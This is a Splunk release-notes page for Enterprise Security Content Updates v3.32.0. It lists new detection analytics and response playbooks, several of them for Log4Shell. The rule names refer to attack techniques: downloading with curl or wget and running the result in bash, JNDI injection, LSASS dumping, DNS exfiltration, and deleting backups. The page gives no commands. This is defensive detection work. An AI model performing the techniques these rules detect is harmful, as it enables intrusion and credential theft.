Splunk® Security Content

Release Notes

This documentation does not apply to the most recent version of Splunk® Security Content. For documentation on the most recent version, go to the latest release.

What's new

Enterprise Security Content Updates v3.32.0 was released on December 15, 2021. It includes the following enhancements.

New analytic story

  • Log4Shell CVE-2021-44228

Updated analytic story

  • Active Directory Lateral Movement

New analytics

  • Curl Download and Bash Execution
  • Wget Download and Bash Execution
  • Linux Java Spawning Shell
  • Windows Java Spawning Shell
  • Java Class File download by Java User Agent
  • Outbound Network Connection from Java Using Default Ports
  • Log4Shell JNDI Payload Injection Attempt
  • Log4Shell JNDI Payload Injection with Outbound Connection
  • Detect Outbound LDAP Traffic
  • Hunting for Log4Shell
  • Possible Lateral Movement PowerShell Spawn
  • Short Lived Scheduled Task
  • Randomly Generated Windows Service Name
  • Randomly Generated Scheduled Task Name
  • Unusual Number of Computer Service Tickets Requested
  • Unusual Number of Remote Endpoint Authentication Events

Updated analytics

  • Any PowerShell DownloadFile
  • CMD Carry Out String Command Parameter
  • Malicious PowerShell Process - Connect To Internet With Hidden Window

New analytics for Splunk Behavioral Analytics

  • Detect RClone Command-Line Usage
  • Windows Curl Upload to Remote Destination
  • DNS Exfiltration Using Nslookup App
  • Fsutil Zeroing File
  • BCDEdit Failure Recovery Modification
  • WBAdmin Delete System Backups
  • Excessive Number of Office Files Copied
  • High File Deletion Frequency

Updated analytics for Splunk Behavioral Analytics

  • Attempt To Delete Services
  • Attempt To Disable Services
  • Attempted Credential Dump From Registry via Reg exe
  • Delete a net user
  • Deny Permission using Cacls Utility
  • Detect Dump LSASS Memory using comsvcs
  • Disable Net User Account
  • First time seen command line argument
  • Grant Permission Using Cacls Utility
  • Prohibited apps spawning cmdprompt
  • Potential Pass the Token or Hash Observed at the Destination Device
  • Rare Parent-Child Process Relationship
  • ptt pth kerb ntlm origin device
  • Resize Shadowstorage Volume
  • sdelete application execution

New playbooks

  • Log4Shell Investigate and Respond
  • Internal Host Splunk Investigate
  • Internal Host SSH Log4j Investigate
  • Internal Host SSH Investigate
  • Internal Host Winrm Log4j Investigate
  • Internal Host Winrm Investigate
  • Internal Host Winrm Log4j Respond
  • Internal Host SSH Log4j Respond

Other updates

  • Added Splunk Behavioral Analytics package
  • Update docker CI testing logic
  • Added rendering Playbook to docs
Last modified on 15 December, 2021
  What's in Splunk Security Content

This documentation applies to the following versions of Splunk® Security Content: 3.32.0

Acrobat logo Download manual
Acrobat logo Download this page

Was this topic useful?







You must be logged into splunk.com in order to post comments. Log in now.

Please try to keep this discussion focused on the content covered in this documentation topic. If you have a more general question about Splunk functionality or are experiencing a difficulty with Splunk, consider posting a question to Splunkbase Answers.

0 out of 1000 Characters